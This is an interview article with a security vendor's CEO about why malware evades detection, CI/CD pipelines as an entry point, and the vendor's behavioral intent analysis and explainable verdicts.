When security decisions come too late, and attackers know it
In this Help Net Security, Chris O’Ferrell, CEO at CodeHunter, talks about why malware keeps succeeding, where attackers insert malicious code in the SDLC, and how CI/CD pipelines can become a quiet entry point. He also breaks down the difference between behavioral detection and behavioral intent analysis, and why explainable results matter for security teams.

What is the most common reason modern malware succeeds even in organizations with mature EDR and threat intel programs?
Modern malware succeeds because most security stacks still make decisions too late.
Even very mature EDR and threat intelligence programs are optimized around detection and response after something executes. They’re excellent at finding known bad activity, correlating signals, and helping teams respond quickly once intent becomes obvious. But attackers have learned how to live in the gray space before that moment, when code is new, signed, or sourced from somewhere that looks trustworthy.
AI-assisted malware mutation has accelerated this problem. Every artifact can be a first-seen event. Indicators age almost instantly. So when a tool isn’t sure, it labels something “unknown” or “suspicious” and hands it to an analyst. At scale, that creates a decision bottleneck. Malware gets through not because defenders miss it entirely, but because no system can say with confidence, early enough, whether that code should be allowed to run in the first place.
The attack surface has also shifted. A lot of malicious code today doesn’t arrive through obvious phishing or drive-by downloads. It enters quietly through software pipelines, automation workflows, and trusted internal systems, places that weren’t designed to be hostile environments. Once code is inside those paths, it inherits trust by default.
If you look at the modern SDLC, where is the easiest point for an attacker to insert malicious runnable code with the lowest chance of detection?
In most enterprise development environments, the lowest-friction insertion point is almost always upstream, before execution ever happens.
CI/CD pipelines move huge volumes of runnable artifacts at machine speed: build outputs, scripts, installers, automation jobs, and third-party components. Most of these are never treated as malware candidates because they’re “internal,” signed, or produced by trusted tooling.
Attackers exploit that assumption. Compromise a dependency, tamper with a build step, or inject logic into an automation script, and the malicious behavior travels downstream wrapped in legitimacy. Traditional controls are focused on endpoints or runtime behavior, not on validating whether a build artifact or script should exist in the first place.
By the time something executes and looks suspicious, it’s already past the point where prevention was possible.
Many vendors claim “behavioral detection,” but their models still depend heavily on known malicious patterns. What is the difference between “behavioral detection” and “behavioral intent analysis” in your framework?
A lot of confusion comes from what problem the system is actually trying to solve.
Behavioral detection usually means observing activity and trying to correlate it to known malicious patterns, techniques, or families. Even when behavior is involved, the outcome is often probabilistic. When confidence is low, the result is a “suspicious” alert that still requires manual investigation.
Behavioral intent analysis asks a different question: What is this artifact designed to do if it runs? Instead of focusing on attribution or similarity, it examines execution paths and runtime actions to determine whether the behavior, regardless of novelty, introduces security, operational, or compliance risk.
Intent analysis treats behavior as a durable signal, not a hint. AI can rewrite appearance endlessly, but it can’t hide the fundamental actions code must take to achieve its objective. By categorizing and mapping those behaviors into consistent risk frameworks, intent analysis enables clear decisions even when the artifact is completely new.
In practical terms, behavioral detection helps you investigate. Behavioral intent analysis helps you decide with greater certainty and trust.
Walk me through what your platform is actually doing under the hood. What parts are static control-flow analysis versus dynamic sandbox observation?
We use a hybrid analysis model designed to balance speed, depth, and determinism.
Static control-flow and behavioral analysis does much of the early work. By examining how execution paths unfold and what actions are possible based on the code itself, the system can identify risky intent without waiting for full execution. That’s essential in CI/CD environments where delays aren’t acceptable.
Dynamic sandbox observation runs in parallel and adds runtime context. It helps validate behaviors that depend on the target environment and provides a basic read out of the primary execution flow of the artifact. However, a sandbox may have difficulty in detecting activity that is delayed or triggered by external input.
The key point is that decisions don’t hinge on a single detonation outcome or a short execution window. Static and dynamic findings are fused into a structured behavioral model that categorizes actions, maps them to impact, and produces a policy-ready verdict. That’s how you get fast answers without sacrificing depth, or falling victim to evasion techniques designed to outwait sandboxes.
Security leaders are increasingly skeptical of black-box AI security decisions. What does explainability mean in your product?
It means that every decision can be traced back to observable behavior and explicit policy logic, not opaque scores or model confidence levels. When a verdict is produced for an artifact, the system shows exactly which behaviors were identified, how they were categorized, and why those behaviors triggered a particular classification. Security teams don’t just get an outcome; they get the reasoning behind it.
AI plays a supporting role, helping surface patterns, summarize findings, and reduce analyst workload, but it doesn’t make enforcement decisions. In our system, artifact classifications are intentionally deterministic. The same artifact evaluated under the same policy will produce the same result every time.
That consistency is critical for trust and governance. Security leaders need decisions that hold up during audits, incident reviews, and regulatory scrutiny. Explainable, deterministic models provide that defensibility, especially as AI-generated code and automated attacks continue to scale.
At the end of the day, explainability is what turns security from educated guesswork into an enforceable control system.